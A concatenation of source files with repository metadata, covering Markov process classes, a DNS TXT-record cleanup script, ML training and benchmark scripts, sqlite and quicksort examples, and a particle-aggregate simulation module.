"457273410@qq.com"
] | 457273410@qq.com |
798c7f096b9f4441b998dfce001956b4ada7b976 | e6afd34196217b6e19580dacbe98cbef9f547693 | /mp_MRP/old/deep_understanding/myrl.py | 570db48af3d31744a7c52bd6c8ca23baf02966d4 | [] | no_license | StevenMaharaj/rlscf_my_notes | 22eabeb00b24c7cb87dcf708be326ecb62453e13 | 093c0f2f78ae071c94718ca270afa4c773923fa7 | refs/heads/main | 2023-07-29T09:44:59.149352 | 2021-09-06T01:18:19 | 2021-09-06T01:18:19 | 400,407,241 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,279 | py | from typing import Generic, Callable
from abc import ABC
from abc import ABC, abstractmethod
from collections import defaultdict
from dataclasses import dataclass
# import graphviz
import numpy as np
from pprint import pprint
from typing import (Callable, Dict, Iterable, Generic, Sequence, Tuple,
Mapping, TypeVar, Set)
from distribution import (Categorical, Distribution, FiniteDistribution,
SampledDistribution)
S = TypeVar('S')
X = TypeVar('X')
S = TypeVar('S')
X = TypeVar('X')
class State(ABC, Generic[S]):
state: S
# def on_non_terminal(self,f: Callable[[NonTerminal[S]], X],default: X) -> X:
# if isinstance(self, NonTerminal):
# return f(self)
# else:
# return default
@dataclass(frozen=True)
class Terminal(State[S]):
state: S
@dataclass(frozen=True)
class NonTerminal(State[S]):
state: S
class MarkovProcess(ABC, Generic[S]):
'''A Markov process with states of type S.
'''
@abstractmethod
def transition(self, state: NonTerminal[S]) -> Distribution[State[S]]:
'''Given a state of the process, returns a distribution of
the next states. Returning None means we are in a terminal state.
'''
def simulate(
self,
start_state_distribution: Distribution[NonTerminal[S]]
) -> Iterable[State[S]]:
'''Run a simulation trace of this Markov process, generating the
states visited during the trace.
This yields the start state first, then continues yielding
subsequent states forever or until we hit a terminal state.
'''
state: State[S] = start_state_distribution.sample()
yield state
while isinstance(state, NonTerminal):
state = self.transition(state).sample()
yield state
def traces(
self,
start_state_distribution: Distribution[NonTerminal[S]]
) -> Iterable[Iterable[State[S]]]:
'''Yield simulation traces (the output of `simulate'), sampling a
start state from the given distribution each time.
'''
while True:
yield self.simulate(start_state_distribution)
Transition = Mapping[NonTerminal[S], FiniteDistribution[State[S]]]
| [
"stevesamah@gmail.com"
] | stevesamah@gmail.com |
e5f0c601126a17759971f370a8f72bf5a5588a3d | c9de632682ba1b4714ac40a6357869cdfcdb34b2 | /python/holidays/__init__.py | b98ae657a5fcd944487df7b6d3ddb984c15f032d | [
"MIT"
] | permissive | lldh/holidata | 29be3a6ab959c0e25993c38f7adefde11bb261d2 | 3d6eb26a7d2178b4629f6423e91bdc4f1b80af35 | refs/heads/master | 2020-08-28T02:46:38.228485 | 2019-10-19T12:09:24 | 2019-10-19T12:09:24 | 217,565,782 | 0 | 0 | null | 2019-10-25T15:42:45 | 2019-10-25T15:42:45 | null | UTF-8 | Python | false | false | 318 | py | from .holidays import Locale
__all__ = [
"Locale",
"da-DK",
"de-AT",
"de-BE",
"de-CH",
"de-DE",
"el-GR",
"en-GB",
"en-NZ",
"en-US",
"es-ES",
"es-US",
"fr-BE",
"fr-FR",
"hr-HR",
"it-IT",
"nb-NO",
"nl-BE",
"nl-NL",
"ru-RU",
"sk-SK",
]
| [
"thomas.lauf@tngtech.com"
] | thomas.lauf@tngtech.com |
7845d7329d08bab1283ada4f9496acfb73c168a1 | 160223a98d4c614191b333e9d251de2195e20d84 | /deleteTXT.py | 6281cba0977e94624ab1dce317b4447ab212d4e1 | [] | no_license | ScentWoman/CertUpdate | bcb2dbc7c7622b3e9aadf33d0cb9e7729789091b | c0f9a9d0d1f7346e712d9a9ea9107ae92dc9ad72 | refs/heads/master | 2021-05-20T00:10:14.853915 | 2020-09-01T00:45:04 | 2020-09-01T00:45:04 | 252,099,566 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,263 | py | #!/usr/bin/env python3
#coding=utf-8
import os
import idna
import json
from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkalidns.request.v20150109.DeleteDomainRecordRequest import DeleteDomainRecordRequest
from aliyunsdkalidns.request.v20150109.DescribeDomainRecordsRequest import DescribeDomainRecordsRequest
domain = idna.decode(os.getenv("DOMAIN"))
accessKeyID = os.getenv("ACCESSKEYID")
accessSecret = os.getenv("ACCESSSECRET")
apinode = "cn-shanghai"
client = AcsClient(accessKeyID, accessSecret, apinode)
request = DescribeDomainRecordsRequest()
request.set_accept_format('json')
request.set_DomainName(domain)
response = client.do_action_with_exception(request)
records = json.loads(str(response, encoding='utf-8'))
records = records["DomainRecords"]["Record"]
for r in records:
if r["Type"] == "TXT" and r["RR"] == "_acme-challenge":
RecordId = r["RecordId"]
request = DeleteDomainRecordRequest()
request.set_accept_format('json')
request.set_RecordId(RecordId)
response = client.do_action_with_exception(request)
print(str(response, encoding='utf-8'))
| [
"noreply@github.com"
] | noreply@github.com |
ac9a58095a2dbea5ba34aa817faf8212aa33e21b | 1d9833e16c36dec536c00f789f7a3f624612e612 | /src/VGGnet.py | d4c05c9da02e5ec434cd56afd2abfe90190a2f75 | [] | no_license | genglsh/class_sex | adb1e24c75e11a90bd9dc2443e3a40aac60a950d | 96f61de59a811e4a90733549cbbd120874d2cb74 | refs/heads/master | 2020-04-07T17:29:17.536461 | 2019-07-23T00:43:52 | 2019-07-23T00:43:52 | 158,571,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,279 | py | import numpy as np
import tensorflow as tf
import os
import json
import cv2
import sys
from datetime import datetime
import math
import time
import tensorflow as tf
from net_fun import *
import json
def time_tensorflow_run(session, target, feed, info_string):
num_steps_burn_in = 10
total_duration = 0.0
total_duration_squared = 0.0
for i in range(num_steps_burn_in+num_batches):
start_time = time.time()
_ = session.run(target, feed_dict = feed)
duration = time.time() - start_time
if i >= num_steps_burn_in:
if not i % 10 :
print('')
total_duration += duration
total_duration_squared += duration * duration
mn = total_duration/ num_batches
vr = total_duration_squared/num_batches - mn * mn
sd = math.sqrt(vr)
print()
def run_benchmark():
with tf.Graph().as_default():
image_size = 224
image = tf.Variable(tf.random_normal([batch_size,
image_size,
image_size,
3],
dtype=tf.float32,
stddev=1e-1))
keep_prob = tf.placeholder(tf.float32)
prediction, softmax, fc8, p = inference_op(image, keep_prob)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
time_tensorflow_run(sess, prediction, {keep_prob:1.0}, 'Forward')
objective = tf.nn.l2_loss(fc8)
grad = tf.gradients(objective, p)
time_tensorflow_run(sess, grad, {keep_prob:0.5}, 'Forward_backward')
if __name__ == '__main__':
batch_size = 100
num_batches = 32
# dict_tem = dict()
# img_name = 'timg.jpg'
# img = cv2.imread(img_name)
# cv2.imshow('1', img)
# i = cv2.waitKey(0)
# dict_tem[img_name] = i
# print(i)
# print(dict_tem)
# w_f = 'test.json'
# with open(w_f, 'w') as f:
# json.dump(dict_tem, f)
# '''
# key(q) = 113 man
# key(w) = 119 woman
# '''
# cv2.destroyAllWindows()
# # if cv2.waitKey(100)>0:
# # cv2.destroyAllWindows()
run_benchmark()
| [
"970808471@qq.com"
] | 970808471@qq.com |
2402b83ef5cd0b70fcb7d27ab642b796d4d37ef7 | bcff7145c765324233b9bfd42c325901a9514b50 | /Sklep/wsgi.py | 195a22245386afb85cd0eeaa296f090af5384326 | [] | no_license | waltad/Sklep | 3484e7dc3dd5acfb9fcbde49a6024354b7f6ff1a | 2c027c222537eef3e2e49b2cd180028c796e2240 | refs/heads/master | 2023-08-25T00:07:53.562229 | 2021-10-10T13:28:49 | 2021-10-10T13:28:49 | 410,259,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
WSGI config for Sklep project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Sklep.settings')
application = get_wsgi_application()
| [
"tadek.waluga@gmail.com"
] | tadek.waluga@gmail.com |
3f40dfbcfa58149e96a1a0ae3e8456f1e82d73d2 | e6ae448e67fc9cff39614eb73c5a6b0745f097d3 | /quick_sort.py | 1f23630195d8a9fd84e2c7ec8190ef4cfc21710f | [] | no_license | cdredmond/Python | 975327e1b6891b69cda91440360bcec336502d0a | ad01d12a1985ee67dc80acd1ed5c421a7f66a501 | refs/heads/master | 2020-05-23T01:35:15.749248 | 2017-08-08T13:20:42 | 2017-08-08T13:20:42 | 23,943,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | def quick_sort(a_list):
quick_sort_helper(a_list, 0, len(a_list) - 1)
def quick_sort_helper(a_list, first, last):
if first < last:
split_point = partition(a_list, first, last)
quick_sort_helper(a_list, first, split_point - 1)
quick_sort_helper(a_list,split_point + 1, last)
def partition(a_list, first, last):
pivot_value = a_list[first]
left_mark = first + 1
right_mark = last
done = False
while not done:
while left_mark <= right_mark and \
a_list[left_mark] <= pivot_value:
left_mark = left_mark + 1
while a_list[right_mark] >= pivot_value and\
right_mark >= left_mark:
right_mark = right_mark - 1
if right_mark < left_mark:
done = True
else:
temp = a_list[left_mark]
a_list[left_mark] = a_list[right_mark]
a_list[right_mark] = temp
temp = a_list[first]
a_list[first] = a_list[right_mark]
a_list[right_mark] = temp
return right_mark
a_list = [54, 26, 93, 17, 77, 31, 44, 55, 20]
quick_sort(a_list)
print(a_list)
| [
"charlesdredmond@gmail.com"
] | charlesdredmond@gmail.com |
841522d1b8b277a3a8b10930d1882bc2a73b7dba | 3fa6b53052fdb68e24347ec2f229cc162c9209a9 | /src/main_rereading.py | dc3fb54413c815a88411d165d5ee5486a70901c9 | [] | no_license | ZJULearning/videoqa | 9dbb5f7a479c6983c1e0151069242d271014a4d8 | 1de9602e4a0f0506487ecf014190d4e261c8998f | refs/heads/master | 2022-01-08T06:52:05.156411 | 2019-06-17T05:36:28 | 2019-06-17T05:36:28 | 83,045,581 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,956 | py | from rereader import *
import theano
import theano.tensor as T
import numpy as np
from blocks.graph import ComputationGraph
import h5py
from fuel.datasets.hdf5 import H5PYDataset
from fuel.transformers import Flatten
from fuel.streams import DataStream
from fuel.schemes import SequentialScheme, ShuffledScheme
from blocks.extensions.monitoring import DataStreamMonitoring
from blocks.algorithms import GradientDescent, CompositeRule, StepClipping, RMSProp, Adam
from blocks.main_loop import MainLoop
from blocks.extensions import FinishAfter, Printing
from blocks.extensions.monitoring import DataStreamMonitoring, TrainingDataMonitoring
from blocks.extensions import FinishAfter, Timing, Printing, ProgressBar
from blocks.monitoring import aggregation
from blocks.model import Model
from blocks.extensions.saveload import Checkpoint
from blocks_extras.extensions.plot import Plot
from saveSnapshot import *
prob_dim = 3591
bs = 100
# max ans length + <EOS> + <Unknown>
max_ans_length = 22
joint_dim = 1024
model = rereading(
bs, max_ans_length,
4096, 300,
2048,
1024,
1024,
1024,
1024,
2048,
prob_dim,
prob_dim)
video_length = 300
max_len = 27
visual_dim = 4096
word_dim = 300
# frames = theano.shared(np.asarray(np.zeros((bs,
# video_length,
# visual_dim)),
# dtype=theano.config.floatX),
# borrow=True,
# name='visual_features')
# qas = theano.shared(np.asarray(np.zeros((bs,
# max_len,
# word_dim)),
# dtype=theano.config.floatX),
# borrow=True,
# name='question_features')
# qas_rev = theano.shared(np.asarray(np.zeros((bs,
# max_len,
# word_dim)),
# dtype=theano.config.floatX),
# borrow=True,
# name='question_features_reverse')
# mask = theano.shared(np.asarray(np.ones((bs)),
# dtype='int'),
# borrow=True,
# name='mask')
# maskMat = theano.shared(np.asarray(np.zeros((bs, max_len)),
# dtype=theano.config.floatX),
# borrow=True,
# name='mask_matrix')
padding = T.constant(np.zeros((max_ans_length,
bs,
joint_dim * 4)).astype(np.float32))
# m = np.ones((bs, max_ans_length))
# m[:, 5::] = 0
# mask01 = theano.shared(m.astype(np.float32))
frames = T.tensor3('visual_features')
qas = T.tensor3('question_features')
qas_rev = T.tensor3('question_features_reverse')
mask = T.lmatrix('mask')
maskMat = T.matrix('mask_matrix')
mask01 = T.matrix('mask01')
gt = T.lmatrix('label')
model.build_model(frames, qas, qas_rev, mask, maskMat, mask01, padding)
cost = model.loss(gt, mask01)
cost.name = 'cost'
error = model.error(gt, mask01)
error.name = 'error'
cg = ComputationGraph(cost)
data_train = H5PYDataset('/home/xuehongyang/TGIF_open_161217.hdf5', which_sets=('train',),
subset=slice(0, 230689//bs*bs))
data_val = H5PYDataset('/home/xuehongyang/TGIF_open_161217.hdf5', which_sets=('validation',),
subset=slice(0, 24696//bs*bs))
data_test = H5PYDataset('/home/xuehongyang/TGIF_open_161217.hdf5', which_sets=('test',),
subset=slice(0, 32378//bs*bs))
data_stream_train = DataStream.default_stream(
data_train,
iteration_scheme=ShuffledScheme(data_train.num_examples, batch_size=bs))
data_stream_val = DataStream.default_stream(
data_val,
iteration_scheme=SequentialScheme(
data_val.num_examples, batch_size=bs))
data_stream_test = DataStream.default_stream(
data_test,
iteration_scheme=SequentialScheme(
data_test.num_examples, batch_size=bs))
monitor = TrainingDataMonitoring(
variables=[cost], prefix='train', every_n_batches=500, after_epoch=True)
monitor_val = DataStreamMonitoring(
variables=[cost, error], data_stream=data_stream_val, prefix='validation', after_epoch=True)
monitor_test = DataStreamMonitoring(
variables=[error], data_stream=data_stream_test, prefix='test', after_epoch=True)
learning_rate = 0.00008
n_epochs=100
algorithm = GradientDescent(cost=cost,
parameters=cg.parameters,
on_unused_sources='ignore',
step_rule=CompositeRule([
StepClipping(10.),
Adam(learning_rate),
]))
main_loop = MainLoop(model=Model(cost),
data_stream=data_stream_train,
algorithm=algorithm,
extensions=[
Timing(),
FinishAfter(after_n_epochs=n_epochs),
monitor,
monitor_val,
monitor_test,
saveSnapshot('/home/xuehongyang/checkpoints_read/snapshot',
save_main_loop=False,
after_epoch=True,
save_separately=['log', 'model']),
ProgressBar(),
Printing(every_n_batches=500),
Plot('videoqa_open_rereading', channels=[['train_cost']],
every_n_batches=500,
after_batch=True)])
print('starting...')
main_loop.run()
| [
"xuehy@live.cn"
] | xuehy@live.cn |
26f57305b55d3b30eaa55261b2928f5dc17ece1b | b8ee76250770ba628b818a26b6f894347ff2e390 | /Sqlite3Module.py | f3dd02adf33ac2df83d79a9fb702b4e8d11bbb8e | [] | no_license | SimonGideon/Journey-to-Pro | 77c77bd1a5de387c41bc8618100bbb3957d15706 | 1591310891c7699710e992fe068b8fa230ac3d56 | refs/heads/master | 2023-04-28T19:31:53.155384 | 2021-05-18T19:18:32 | 2021-05-18T19:18:32 | 358,926,411 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | import sqlite3
conn = sqlite3.connect('Database1.db')
c = conn.cursor()
# Create a table
c.execute('''CREATE TABLE stocks(date text, trans text, symbol text, qty real, price real)''')
# Insert a raw of data.
c.execute("INSERT INTO stock VALUES ('2006-01-05','BUY','RHAT',100,35,14)")
conn.commit()
conn.close()
# Getting Values from the db and error handling.
import sqlite3
conn = sqlite3.connect('Database1.db')
c = conn.cursor()
c.execute("SELECT * from table_name where id=cust_id")
for row in c:
print(row)
# To fetch mathching.
print(c.fetchone())
# For mutiple row.
a=c.fetchall()
for row in a:
print(row)
try:
except sqlite3.Error as e:
print("An error occured:", e.args[0]) | [
"simongideon918@gmail.com"
] | simongideon918@gmail.com |
32132dadfe46998dce89622fe20c09f838a966b1 | d899e761b6e152cb4470cfa12741ca700a53f377 | /Scripts/Answer.py | b75d252dfabf2c44b443b23fee1dd85c7406f00d | [] | no_license | DBtycoon/REAPER | 52a32d98bd3043d01f3dc0ceb62a54dc305e661a | 7563be2f75723c5e8b377c0330febfd99ee14cb8 | refs/heads/master | 2021-01-01T17:31:56.177586 | 2013-07-18T04:10:19 | 2013-07-18T04:10:19 | 7,144,935 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | from reaper_python import *
'''
Refers to the possible answers returned from a message box
'''
Ok = 1
Cancel = 2
Abort = 3
Retry = 4
Ignore = 5
Yes = 6
No = 7
class Answer:
Ok = 1
Cancel = 2
Abort = 3
Retry = 4
Ignore = 5
Yes = 6
No = 7
| [
"civress2@yahoo.com"
] | civress2@yahoo.com |
351231d4e432a8544864dbc8f9fc095f617f1e0c | 31575890c75d65455512ee7377bc39830de8a055 | /simulation.py | 51218f289dd038087633e6a16e76ff9bd00d2a00 | [] | no_license | dalerxli/aggregate | 712a4c9074c3235c0fe0c3686dc3c3c7be4853dd | 4c9a42b02ee50df4984e3ca730697a030a60a8ff | refs/heads/master | 2020-04-02T09:00:55.818879 | 2016-11-18T11:18:36 | 2016-11-18T11:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,345 | py | #!/usr/bin/python
"""
simulation.py
Mark S. Bentley (mark@lunartech.org), 2016
Simulation environment module for building aggregates. Currently this is non-
dynamic and uses random vectors and line-sphere/line-spheroid intersects to
build various aggreates types. The simulation environment tracks the per-
particle position, mass, id etc. of the particle and also provides analytics
such as the centre of mass, radius of gyration and fractal dimension.
The key class is Simulation which provides methods that add monometers/
aggregates to the simulation and operates on the simulation domain.
Several help methods are provided at the top level.
Requirements:
- numpy
- matplotlib - for show(using='mpl')
- mayavi - for show(using='maya')
- scipy - for Simulation.chull()
- evtk - for Simulation.to_vtk()
"""
import os
import numpy as np
from scipy.spatial.distance import cdist
class Simulation:
"""
This class provides functionality for a generic particle simulation, with methods for
adding particles, moving them in the simulation domain, checking for intersects and
overlaps etc. It also calculates basic properties of particle collections within the domain.
"""
def __init__(self, max_pcles=1000, filename=None, density=None, debug=False):
"""
Initialise the simulation. The key parameter here is the maximum number of particles,
in order to pre-allocate array space.
nattr=<int> can be used to set the number of additional attributes (besides
x,y,z,r and id) to be stored in the array. Not all particle attributes
need to be stored in the array, but those that may be queried for
particle selection should be (for speed).
"""
if (max_pcles is None) and (filename is None):
print('WARNING: simulation object created, but no size given - use max_pcles or sim.from_csv')
elif filename is not None:
self.from_csv(filename, density=density)
else:
self.pos = np.zeros( (max_pcles, 3 ), dtype=np.float )
self.id = np.zeros( max_pcles, dtype=np.int )
self.radius = np.zeros( max_pcles, dtype=np.float )
self.volume = np.zeros( max_pcles, dtype=np.float )
self.mass = np.zeros( max_pcles, dtype=np.float )
self.density = np.zeros( max_pcles, dtype=np.float )
self.count = 0
self.agg_count = 0
self.next_id = 0
self.debug = debug
def update(self):
"""Updates internally calculated parameters, such as mass and volume, after changes
to the simulation"""
self.volume = (4./3.) * np.pi * self.radius**3.
self.mass = self.volume * self.density
return
def scale(self, scale=1.):
"""Applies a scale multiplier to all positions and radii. Mass, volume etc.
are also updated accordingly"""
self.pos *= scale
self.radius *= scale
self.update()
return
def __str__(self):
"""
Returns a string with the number of particles and the bounding box size.
"""
return "<Simulation object contaning %d particles>" % ( self.count )
def get_bb(self):
"""
Return the bounding box of the simulation domain
"""
xmin = self.pos[:,0].min() - self.radius[np.argmin(self.pos[:,0])]
xmax = self.pos[:,0].max() + self.radius[np.argmin(self.pos[:,0])]
ymin = self.pos[:,1].min() - self.radius[np.argmin(self.pos[:,1])]
ymax = self.pos[:,1].max() + self.radius[np.argmin(self.pos[:,1])]
zmin = self.pos[:,2].min() - self.radius[np.argmin(self.pos[:,2])]
zmax = self.pos[:,2].max() + self.radius[np.argmin(self.pos[:,2])]
return (xmin, xmax), (ymin,ymax), (zmin, zmax)
def bb_aspect(self):
"""
Returns the aspect ratio X:Y:Z of the bounding box.
"""
(xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
xsize = xmax-xmin
ysize = ymax-ymin
zsize = zmax-zmin
return (xsize, ysize, zsize)/min(xsize, ysize, zsize)
def fit_ellipse(self, tolerance=0.01):
""" Find the minimum volume ellipsoid which holds all the points
Based on work by Nima Moshtagh
http://www.mathworks.com/matlabcentral/fileexchange/9542
and also by looking at:
http://cctbx.sourceforge.net/current/python/scitbx.math.minimum_covering_ellipsoid.html
Which is based on the first reference anyway!
Code adapted from: https://github.com/minillinim/ellipsoid/blob/master/ellipsoid.py
Returns:
(center, radii, rotation)
"""
from numpy import linalg
P = self.pos
(N, d) = np.shape(P)
d = float(d)
# Q will be our working array
Q = np.vstack([np.copy(P.T), np.ones(N)])
QT = Q.T
# initializations
err = 1.0 + tolerance
u = (1.0 / N) * np.ones(N)
# Khachiyan Algorithm
while err > tolerance:
V = np.dot(Q, np.dot(np.diag(u), QT))
M = np.diag(np.dot(QT , np.dot(linalg.inv(V), Q))) # M the diagonal vector of an NxN matrix
j = np.argmax(M)
maximum = M[j]
step_size = (maximum - d - 1.0) / ((d + 1.0) * (maximum - 1.0))
new_u = (1.0 - step_size) * u
new_u[j] += step_size
err = np.linalg.norm(new_u - u)
u = new_u
# center of the ellipse
center = np.dot(P.T, u)
# the A matrix for the ellipse
A = linalg.inv(
np.dot(P.T, np.dot(np.diag(u), P)) -
np.array([[a * b for b in center] for a in center])
) / d
# Get the values we'd like to return
U, s, rotation = linalg.svd(A)
radii = 1.0/np.sqrt(s)
return (center, radii, rotation)
def elongation(self):
(center, radii, rotation) = self.fit_ellipse()
return max(radii/min(radii))
def chull(self):
"""
Calculates the convex hull (minimum volume) bounding the set of
sphere centres - DOES NOT ACCOUNT FOR RADII!
"""
from scipy.spatial import ConvexHull
hull = ConvexHull(self.pos)
return hull
def show(self, using='maya', fit_ellipse=False, show_hull=False):
"""
A simple scatter-plot to represent the aggregate - either using mpl
or mayavi
"""
if fit_ellipse:
(center, radii, rotation) = self.fit_ellipse()
u = np.linspace(0.0, 2.0 * np.pi, 100)
v = np.linspace(0.0, np.pi, 100)
# cartesian coordinates that correspond to the spherical angles:
x = radii[0] * np.outer(np.cos(u), np.sin(v))
y = radii[1] * np.outer(np.sin(u), np.sin(v))
z = radii[2] * np.outer(np.ones_like(u), np.cos(v))
# rotate accordingly
for i in range(len(x)):
for j in range(len(x)):
[x[i,j],y[i,j],z[i,j]] = np.dot([x[i,j],y[i,j],z[i,j]], rotation) + center
if show_hull:
hull = self.chull()
hull_x = hull.points[:,0]
hull_y = hull.points[:,1]
hull_z = hull.points[:,2]
if using=='mpl':
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
# ax.set_aspect('equal')
h = ax.scatter(self.pos[:,0], self.pos[:,1], self.pos[:,2], s=100.)
if fit_ellipse:
ax.plot_wireframe(x, y, z, rstride=4, cstride=4, color='k', alpha=0.2)
plt.show()
elif using=='maya':
import mayavi.mlab as mlab
fig = mlab.figure(bgcolor=(1, 1, 1), fgcolor=(0, 0, 0))
h = mlab.points3d(self.pos[:,0], self.pos[:,1], self.pos[:,2], self.radius, scale_factor=2, resolution=16)
if fit_ellipse:
mlab.mesh(x,y,z, opacity=0.25, color=(1,1,1))
if show_hull:
mlab.triangular_mesh(hull_x, hull_y, hull_z, hull.simplices, representation='wireframe', color=(1,1,1))
else:
print('ERROR: using= must ne either mpl or maya')
return h
def add(self, pos, radius, density=1., check=False):
"""
Add a particle to the simulation.
If check=True the distance between the proposed particle and each other
is checked so see if they overlap. If so, False is returned.
"""
if check:
if not self.check(pos, radius):
return False
if len(pos) != 3:
print('ERROR: particle position should be given as an x,y,z tuple')
return None
radius = float(radius)
self.pos[self.count] = np.array(pos)
self.radius[self.count] = radius
self.volume[self.count] = (4./3.)*np.pi*radius**3.
self.density[self.count] = density
self.mass[self.count] = self.volume[self.count] * density
self.count += 1
self.id[self.count-1] = self.next_id
self.next_id += 1
return True
def add_agg(self, sim, check=False):
"""
Add an aggregate particle to the simulation. If check=True the distance between the proposed
particle and each other is checked so see if they overlap. If so, False is returned.
"""
if check:
# TODO - implement aggregate checking
pass
if not self.check(pos, radius):
return False
# TODO
num_pcles = sim.count
self.pos[self.count:self.count+num_pcles] = sim.pos[0:sim.count]
self.radius[self.count:self.count+num_pcles] = sim.radius[0:sim.count]
self.density[self.count:self.count+num_pcles] = sim.density[0:sim.count]
self.volume[self.count:self.count+num_pcles] = (4./3.)*np.pi*sim.radius[0:sim.count]**3.
self.mass[self.count:self.count+num_pcles] = \
self.volume[self.count:self.count+num_pcles] * self.density[self.count:self.count+num_pcles]
self.id[self.count:self.count+num_pcles] = self.id.max()+1+range(num_pcles)
self.count += num_pcles
return True
def intersect(self, position, direction, closest=True):
"""
Wrapper for line_sphere() that detects if the position passed is for a
monomer or an aggregates and handles each case.
"""
if type(position)==tuple:
position = np.array(position)
if len(position.shape)==2: # position is an array, i.e. an aggregate
# loop over each monomer in the passed aggregate and check if it
# intersects any of the monomers already in the domain
max_dist = 10000. # TODO calculate a sensible value here
sim_id = None
hits = None
monomer_pos = None
for pos in position:
ids, dist = self.line_sphere(pos, direction, closest=True, ret_dist=True)
if dist is not None:
if dist < max_dist:
max_dist = dist
monomer_pos = pos
sim_id = ids # id of the simulation agg
if sim_id is not None:
hit = monomer_pos + max_dist * direction # position of closest intersect
return sim_id, max_dist, hit
else:
return None, None, None
else:
ids, hits = self.line_sphere(position, direction, closest=closest, ret_dist=False)
return ids, hits
def line_sphere(self, position, direction, closest=True, ret_dist=False):
"""
Accepts a position and direction vector defining a line and determines which
particles in the simulation intersect this line, and the locations of these
intersections. If closest=True only the shortest (closest) intersect is
returned, otherwise all values are given.
If ret_dist=True then the distance from position to the hit will be returned,
rather than the coordinates of the hit itself.
See, for example, https://en.wikipedia.org/wiki/Line%E2%80%93sphere_intersection
"""
# calculate the discriminator using numpy arrays
vector = position - self.pos[0:self.count]
b = np.sum(vector * direction, 1)
c = np.sum(np.square(vector), 1) - self.radius[0:self.count] * self.radius[0:self.count]
disc = b * b - c
# disc<0 when no intersect, so ignore those cases
possible = np.where(disc >= 0.0)
# complete the calculation for the remaining points
disc = disc[possible]
ids = self.id[possible]
if len(disc)==0:
return None, None
b = b[possible]
# two solutions: -b/2 +/- sqrt(disc) - this solves for the distance along the line
dist1 = -b - np.sqrt(disc)
dist2 = -b + np.sqrt(disc)
dist = np.minimum(dist1, dist2)
# choose the minimum distance and calculate the absolute position of the hit
hits = position + dist[:,np.newaxis] * direction
if closest:
if ret_dist:
return ids[np.argmin(dist)], dist[np.argmin(dist)]
else:
return ids[np.argmin(dist)], hits[np.argmin(dist)]
else:
if ret_dist:
return ids, dist
else:
return ids, hits
def check(self, pos, radius):
"""
Accepts a proposed particle position and radius and checks if this overlaps with any
particle currently in the domain. Returns True if the position is acceptable or
False if not.
"""
if len(pos.shape)==2: # passed an aggregate
if cdist(pos, self.pos[0:self.count]).min() < (radius.max() + self.radius[0:self.count].max()) > 0:
# TODO does not properly deal with polydisperse systems
if self.debug: print('Cannot add aggregate here!')
return False
else:
return True
else:
if (cdist(np.array([pos]), self.pos[0:self.count+1])[0] < (radius + self.radius[0:self.count+1].max())).sum() > 0:
if self.debug: print('Cannot add particle here!')
return False
else:
return True
def farthest(self):
"""
Returns the centre of the particle farthest from the origin
"""
return self.pos.max()
def com(self):
"""
Computes the centre of mass
"""
return np.average(self.pos[:self.count], axis=0, weights=self.mass[:self.count])
def recentre(self):
"""
Re-centres the simulation such that the centre-of-mass of the assembly
is located at the origin (0,0,0)
"""
self.pos -= self.com()
def move(self, vector):
"""Move all particles in the simulation by the given vector"""
self.pos += vector
def gyration(self):
"""
Returns the radius of gyration: the RMS of the monomer distances from the
centre of mass of the aggregate.
"""
return np.sqrt(np.square(self.pos[:self.count]-self.com()).sum()/self.count)
def char_rad(self):
"""
Calculates the characteristic radius: a_c = sqrt(5/3) * R_g
"""
return np.sqrt(5./3.) * self.gyration()
def porosity_gyro(self):
"""
Calculates porosity as 1 - vol / vol_gyration
"""
return (1. - ( (self.volume[:self.count].sum()) / ((4./3.)*np.pi*self.gyration()**3.) ) )
def porosity_chull(self):
return (1. - ( (self.volume[:self.count].sum()) / self.chull().volume ) )
def density_gyro(self):
"""
Calculates density as (mass of monomers)/(volume of gyration)
"""
return (self.mass[:self.count].sum() / ((4./3.)*np.pi*self.gyration()**3.) )
def density_chull(self):
return (self.mass[:self.count].sum() / self.chull().volume)
def fractal_scaling(self, prefactor=1.27):
"""Calculates the fractal dimension according to the scaling relation:
N = k * (Rg/a)**Df
The value of k, the fratcal pre-factor, can be set with prefactor=
"""
return np.log(self.count/prefactor)/np.log(self.gyration()/self.radius[0:self.count].min())
def fractal_mass_radius(self, num_pts=100, show=False):
"""
Calculate the fractal dimension of the domain using the relation:
m(r) prop. r**D_m
"""
r = np.linalg.norm(self.pos, axis=1)
start = self.radius.min()
stop = (self.farthest()+self.radius.max())*.8
step = (stop-start)/float(num_pts)
radii = np.arange(start, stop, step)
count = np.zeros(len(radii))
# TODO - implement sphere-sphere intersection and correctly calculate
# contribution from spheres at the boundary of the ROI.
for idx, i in enumerate(radii):
count[idx] = r[r<=i].size
# Need to fit up until the curve is influenced by the outer edge
coeffs = np.polyfit(np.log(radii),np.log(count),1)
poly = np.poly1d(coeffs)
if show:
fig, ax = plt.subplots()
ax.loglog(radii, count)
ax.grid(True)
ax.set_xlabel('radius')
ax.set_ylabel('count')
yfit = lambda x: np.exp(poly(np.log(radii)))
ax.loglog(radii, yfit(radii))
plt.show()
return coeffs[0]
def fractal_box_count(self, num_grids=100):
"""
Calculate the fractal dimension of the domain using the cube-counting method.
"""
# need to determine if a square contains any of a sphere...
# first use a bounding box method to filter the domain
(xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
# need to determine minimum and maximum box sizes, and the increments
# to use when slicing the domain
r_min = self.radius.min()
max_div_x = int(np.ceil((xmax-xmin) / r_min))
max_div_y = int(np.ceil((ymax-ymin) / r_min))
